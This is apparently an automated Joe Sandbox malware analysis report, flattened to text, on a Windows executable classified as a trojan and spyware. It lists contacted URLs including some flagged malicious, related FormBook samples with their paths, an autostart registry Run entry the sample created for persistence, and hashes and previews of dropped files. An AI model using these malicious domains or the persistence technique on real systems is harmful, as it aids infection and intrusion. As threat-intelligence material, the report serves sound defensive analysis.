                                                                                                                                                            unknown
                                                                                                                                                            https://www.msn.com/favicon.icoimagestore.dat.29.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.whskysr.com/27MTDK4Q/GG1SRSH/?uid=43019&sub1=enus3-1211BBI4MeJ[1].json.29.drfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              http://www.amazon.com/msapplication.xml.15.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.twitter.com/msapplication.xml6.15.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBmme[1].json.29.drfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                            IP
                                                                                                                                                                            127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572930
Start date and time: 2024-12-11 09:38:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Nieuwebestellingen10122024.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@67/281@33/16
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 60%
• Number of executed functions: 68
• Number of non-executed functions: 247
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.42.73.29, 2.16.230.26, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 172.217.19.238, 23.206.197.34, 23.206.197.43, 23.206.197.51, 23.206.197.50, 23.206.197.48, 23.206.197.10, 23.206.197.49, 23.206.197.11, 23.206.197.42, 2.20.68.210, 2.20.68.222, 23.206.197.16, 131.253.33.203, 2.18.40.139, 2.18.40.146, 2.18.40.163, 2.18.40.162, 2.18.40.132, 2.18.40.133, 2.18.40.149, 2.18.40.136, 2.18.40.140, 13.107.21.237, 204.79.197.237, 13.74.129.1, 2.20.68.223, 2.20.68.206, 2.16.229.162, 204.79.197.200, 51.105.71.137, 23.206.197.18, 23.206.197.24, 23.206.197.19, 23.206.197.17, 142.250.65.163, 142.250.65.227, 142.251.40.163, 40.126.53.11, 20.190.147.3, 172.202.163.200, 13.107.246.63, 23.200.0.34
                                                                                                                                                                            • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, slscr.update.microsoft.com, img-s-msn-com.akamaized.net, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, e11290.dspg.akamaiedge.net, onedscolprduks03.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, www.gstatic.com, l-0007.l-msedge.net, ieonline.microsoft.com, e28578.d.akamaiedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, c-bing-com.dual-a-0034.a-msedge.net, www-www.bing.com.trafficmanager.net, a1834.dscg2.akamai.net, c.bing.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, a-0003.dc-
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                            • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:39:03 | API Interceptor | 25x Sleep call for process: powershell.exe modified
03:39:08 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
03:39:40 | API Interceptor | 2x Sleep call for process: svchost.exe modified
03:40:02 | API Interceptor | 9317332x Sleep call for process: wscript.exe modified
09:39:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LDSP2VC8 C:\Program Files (x86)\Internet Explorer\iexplore.exe
09:39:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LDSP2VC8 C:\Program Files (x86)\Internet Explorer\iexplore.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.soainsaat.xyz/rum2/
                                                                                                                                                                            New Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.beythome.online/8l49/
                                                                                                                                                                            specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                            • www.restobarbebek.xyz/jm9b/
                                                                                                                                                                            CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.magmadokum.com/fo8o/
                                                                                                                                                                            151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • code.jquery.com/jquery-1.11.3.min.js
                                                                                                                                                                            http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • code.jquery.com/jquery-1.11.3.min.js
                                                                                                                                                                            http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • code.jquery.com/jquery-1.7.min.js
                                                                                                                                                                            https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • code.jquery.com/jquery-3.3.1.min.js
                                                                                                                                                                            http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • code.jquery.com/jquery-1.7.2.min.js
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                            TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 151.101.1.108
                                                                                                                                                                            • 18.165.220.110
                                                                                                                                                                            • 151.101.130.137
                                                                                                                                                                            TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 151.101.1.108
                                                                                                                                                                            • 18.165.220.110
                                                                                                                                                                            • 151.101.130.137
                                                                                                                                                                            No context
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                            Entropy (8bit):0.8579382197099805
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugg:gJjJGtpTq2yv1AuNZRY3diu8iBVqFB
                                                                                                                                                                            MD5:123BD722738D431261BB7894E1C471BA
                                                                                                                                                                            SHA1:EC7DF8FAE2CA627BF8B342529F351B569D764AF2
                                                                                                                                                                            SHA-256:5F0C54904A5DA0A95D7CC40CAA9DB807657C09BD3D95E240086CB6C076E1B6A8
                                                                                                                                                                            SHA-512:4EFFA55B8F28B54E83888C5049B062F4DAB31AAA80D8AD3F339BB7D555AF5E7E67B972F7A50878FF2DED755DDBC46637E72349F8AA29D828B9EFB8AAB9E6F9CD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbcd2ac4d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                            Entropy (8bit):0.6586090813771612
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:5SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:5aza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                            MD5:E025C11F0226E99A50347AA6F17D8353
                                                                                                                                                                            SHA1:0F0916079E297EC5B47256555FE52E29C42DF6CF
                                                                                                                                                                            SHA-256:ED306ECB713AB09D04C6AECD33B7EDE731BB66F6AC066C8DE7187EACDD89D4E0
                                                                                                                                                                            SHA-512:7ECF278C516B358371A08F6F4EB152E64BACA9DCE36A7BD062AEB192DBC342A89E25FC807A9619D3FF4B32110A05820B36FFD7E8C792B851261AF92DE5DF90EB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                            Entropy (8bit):0.08072633064392432
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:gziyYe7uR7GuAJkhvekl12cpg4llrekGltll/SPj:gxz747rxlrpgoJe3l
                                                                                                                                                                            MD5:0CBC8119EE45F18342AA38E4451A9A58
                                                                                                                                                                            SHA1:238205FA002A705CE89070F66D469DA65A8452A6
                                                                                                                                                                            SHA-256:2F66395720069B92F2AF6F241A2321F4D2EFC1ADA24EDA185AADA62DC06C34A7
                                                                                                                                                                            SHA-512:B40545EC5F2345A75645F382C8583646F9B59A6C62931666F1532D0A16870AF0E2A46795DFFF290FFF7FF056ED6867A3628713F60A2CB261A55FB7636B793E28
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                            Entropy (8bit):1.211898593388039
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:yaYuU+J0UnUlaWBBp5qHdzuiFEZ24lO8f:iuU+qUnUlamM9zuiFEY4lO8f
                                                                                                                                                                            MD5:41F479E3BC0033660E37BD0EE46C6CB7
                                                                                                                                                                            SHA1:E486A828A45D5093065E8ABEF9C4A3DB45879091
                                                                                                                                                                            SHA-256:7778A0BDA71875831B44E0AABBFA19B854F0012223F2BF378345ECEE63E900E6
                                                                                                                                                                            SHA-512:F4D20D3B9DCC3895B71FCC2C5BC095053E8C5C61F4596A619F61037E7D2BA6CE935A9781043DFACFAC497064050A501071034D8580698044617359D797B18736
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.7.9.9.4.0.5.6.7.6.5.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.7.9.9.4.2.9.5.8.2.8.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.e.e.f.e.b.f.-.b.d.e.2.-.4.6.0.8.-.9.6.a.6.-.d.7.b.2.3.4.1.6.b.1.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.8.a.2.a.8.f.-.5.1.1.f.-.4.b.6.2.-.b.0.f.a.-.5.2.8.f.1.c.e.5.d.a.6.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.N.i.e.u.w.e.b.e.s.t.e.l.l.i.n.g.e.n.1.0.1.2.2.0.2.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.o.n.s.o.l.e.A.p.p.l.i.c.a.t.i.o.n.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.d.0.-.0.0.0.1.-.0.0.1.4.-.b.5.6.f.-.7.f.1.d.a.8.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.d.c.b.f.4.1.1.f.6.6.d.4.5.5.e.6.0.e.4.3.6.2.c.d.b.d.5.d.b.0.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.7.d.3.9.5.1.4.5.a.4.e.8.b.1.6.4.e.5.0.5.9.7.1.
                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            File Type:Mini DuMP crash report, 16 streams, Wed Dec 11 08:39:01 2024, 0x1205a4 type
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):512373
                                                                                                                                                                            Entropy (8bit):3.3713341985650587
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:UgJeos2Ci2C1CCqTT2b3+vr9xbqSfilaOFzsGraW4+v0OcSq/:Dg2Ci2gqTTi3Qr92naW/F
                                                                                                                                                                            MD5:7DFFFFE20EF9D1B7FED1D63CBA10DF0E
                                                                                                                                                                            SHA1:0988F339BA8A26AF6F8A84DF1473AE1043CB2C67
                                                                                                                                                                            SHA-256:6EA6B60260C5ABD9D4F08848D18DA89D421A37ABE0A09C3E2A4158D9438157D4
                                                                                                                                                                            SHA-512:51D4CC2C691D798A7523786705B1AF46D81C260555A8BE019FF271CFC07D2D4FF8EAA0278EA4F84DD69FF379EAD03C2F2DB5B391D13BDC4214D674F813C36191
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MDMP..a..... ........OYg............t...........<...........$....(......88...(.......t.............l.......8...........T............=..u...........,a...........c..............................................................................eJ.......c......Lw......................T............OYg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8664
                                                                                                                                                                            Entropy (8bit):3.706930373382355
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:R6l7wVeJV8FxP6YEIygVWgmfX4Epr089bVHSfjoHm:R6lXJ+TP6YEdgVWgmfX4gVyfZ
                                                                                                                                                                            MD5:87293CED19B2CDFC5B8C3AE865AF1C44
                                                                                                                                                                            SHA1:31CD277E5530730F46C1B3918A3BCEB925DB06AF
                                                                                                                                                                            SHA-256:722CB4B3F2EBA3344E41CB8D6BC9CE72EA1AB1ED18404B87C1401C52D5CF95FE
                                                                                                                                                                            SHA-512:1AC4AF67687CEB70B2BA5E9B99D40C11276739A2977BAD796094CAAB9767D19500C6D6F2F5FBFC5D2B23AED70CCBD493B60E1E2E5D5F39EA13E454C9DADCB435
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.9.6.<./.P.i.
                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4847
                                                                                                                                                                            Entropy (8bit):4.533199210137322
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:cvIwWl8zsyJg771I9gTWpW8VYQYm8M4J5+1N+F7yq85n122Ec0zY0hqd:uIjfAI7zi7VgJ5kuOJEc0zY0hqd
                                                                                                                                                                            MD5:F8DA1F88036C57BB09FCEB0F5867142B
                                                                                                                                                                            SHA1:F3F09D4C79A32BD402A4F790E162057ADE32E456
                                                                                                                                                                            SHA-256:2F0667E916FBBFDA767A656BF168312A2EDA90F459FC149DB230B31241546E9B
                                                                                                                                                                            SHA-512:E62C4AC3DBAB5E80FF6A9BA5DB9EBABCF3945651E2755B8F31D6AB719828D61E3C5A36F55B003C5A9CECAF7116BAD2C73E83E6577E3D9F4382FB26BCB978C1F3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="626381" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4286
                                                                                                                                                                            Entropy (8bit):3.8046022951415335
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                                                                                                                                                            MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                                                                                                                                                            SHA1:1125C45D285C360542027D7554A5C442288974DE
                                                                                                                                                                            SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                                                                                                                                                            SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44798
                                                                                                                                                                            Entropy (8bit):6.096573107876333
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkSdFuUhDO6vP6OdodUYnMDVvsRncGoup1Xl3jVzXrT:z/Ps+wsI7yOVc69odUachu3VlXr4CRo4
                                                                                                                                                                            MD5:50D23778923F196C926C3443F7633BD1
                                                                                                                                                                            SHA1:DA5EA3E422644A011741F003F0DD19C1A5D65661
                                                                                                                                                                            SHA-256:C9FCDDFDBE2687B6083DCF7CE04B56539D4F300555ADF129AD8FE62F5A1B1FB3
                                                                                                                                                                            SHA-512:30E86869EE80820A48CF1B71D82596D57DC202B97984FEAC74BF4C4AA3D2E8779E5BA35F41FC8738350D11524A925FC75862568CED924EB88250698DB3352080
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44911
                                                                                                                                                                            Entropy (8bit):6.086420707325095
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:OMkbJrT8IeQc5dkSdFuUhDO6vP6Oe7t/zuhvsR3XDgh1+wbCAoTGoup1Xl3jVzXb:OMk1rT8H1Vc6it/zVkh8wbRoThu3VlXb
                                                                                                                                                                            MD5:322E3D8BA8AB03077C30B62B76B2978B
                                                                                                                                                                            SHA1:F466D211339CFCB18F5586A6AD0663EC4FF5BA64
                                                                                                                                                                            SHA-256:8D1D5B70A21665F011543AC3EF9D96B169C251570EF70B6917D90776BAB3053B
                                                                                                                                                                            SHA-512:A416A29357FF1EEF8810A4F00F359C4F4C319B027BB8D8E1AFA11FC94F695821DAA2D54E97B569E8A9ECFED6343BD99DFB4B750882BC9367B7860B99C9218811
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):45126
                                                                                                                                                                            Entropy (8bit):6.092180142487937
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:OMkbJrT8IeQc5dkSdFuUhDO6vP6OdodUYnMDVvsRnvXDgh1+wbCAoTGoup1Xl3jx:OMk1rT8H1Vc69odUavkh8wbRoThu3Vlr
                                                                                                                                                                            MD5:5AA18FE55C12623C0311DCB0224B1D46
                                                                                                                                                                            SHA1:43527501F8BD91D0EAA8296696064C770AB3D725
                                                                                                                                                                            SHA-256:149C3A4D23C9FF23766E79C5D7E3F3E99F206F8936D1D2BD1183E7B0CE3DC4C8
                                                                                                                                                                            SHA-512:DB3C55D0B9223C5F308B37F10226574358EE150043BA261813416EF391EB272811243DDB7C578BC773DA85D434718E1FA95AFA4FC7C483600ADF268989D21547
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):107893
                                                                                                                                                                            Entropy (8bit):4.64013246649014
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                            MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                            SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                            SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                            SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4194304
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                            MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                            SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                            SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                            SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):280
                                                                                                                                                                            Entropy (8bit):4.132041621771752
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD54llt:o1ApdeaEqYsMazlYBVsJDu2ziy54/
                                                                                                                                                                            MD5:BD72B24D3506282E86F2DE573239D060
                                                                                                                                                                            SHA1:6E1A396615B8BCE53E24C9C64BA63C194325EB59
                                                                                                                                                                            SHA-256:1018F6A3BA584F39BACB39A5F83372F0D50274DAE10B189C03F16E23EF02EF72
                                                                                                                                                                            SHA-512:1AD4F2DC7ABA21C13202B5E2CFCDF88D6AE5AB139CD1A8956370E9D61D2129F49CD6C905CDBA82AC8075815B1656487BC4F41A3985BB0053FD85302B16826F0E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8450
                                                                                                                                                                            Entropy (8bit):5.215235704830702
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihzWvXpkAsY8bV+FiA66W7LlaFIMYWPLMJ:stFSBso0xhzWvibGix6W7LlaTYB
                                                                                                                                                                            MD5:5AACB50FC8D57895825A66B72031E591
                                                                                                                                                                            SHA1:3EB978B18360CAC32451918845E97515D2D0C8F0
                                                                                                                                                                            SHA-256:858AB6BB03B04AB87BBFC8A94EE201B01B6F17AAE52101ADAF9DB619854FA7DB
                                                                                                                                                                            SHA-512:46210AA167E9858B448CE02F9DA28E67F5D36730B779F795ED77982B9EE1EDCCB48CBD305A55F636E67883BEB38503FE0C2B42274E48CF0652395A358886A227
                                                                                                                                                                            Malicious:false
